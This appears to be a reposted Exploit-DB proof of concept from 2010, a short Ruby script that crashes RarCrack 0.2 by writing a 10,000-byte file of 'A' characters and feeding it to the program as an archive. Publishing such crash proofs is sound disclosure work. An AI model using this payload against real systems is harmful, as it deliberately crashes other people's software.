RarCrack 0.2 – Buffer Overflow (PoC) - 体验盒子

作者： The_UnKn@wn

日期： 2010-09-19

类别：

dos

平台：

linux

来源：https://www.exploit-db.com/exploits/15054/

#!/usr/bin/env ruby
#overflow.rb
#
#_______________________________
# / ____/ __ \/ __ \/ / / / __ \/ ____</
#/ / __/ /_/ / / / / / / / /_/ /___ \ / / 
# / /_/ / _, _/ /_/ / /_/ / ____/___/ // /
# \____/_/ |_|\____/\____/_/ /_____//_/ 
# 
#
# 	Title: 		RarCrack 0.2 Buffer Overflow POC
# 	Date: 		19.09.2010
# 	Author: 	The_UnKn@wn
# 	Email:		the_unknown [at] group51.org
# 	Twitter:	@The_UnKn0wn
# 	Homepage:	http://group51.org 	
# 	Software Link: 	http://sourceforge.net/projects/rarcrack/files/rarcrack-0.2/%5BUnnamed%20release%5D/rarcrack-0.2.tar.bz2/download
# 	Version: 	0.2
# 	Tested on: 	openSUSE 11.3
# 	CVE: 		none 
#
#	Impact:		RarCrack doesn't check the length of the archive and while cracking it crashes.
#
#	Usage: 
#		$ ruby overflow.rb
#		$ ./rarcrack overflow.zip
#		

text = "A"*10000

File.open("overflow.zip","w") do |l|
	l.puts(text)
end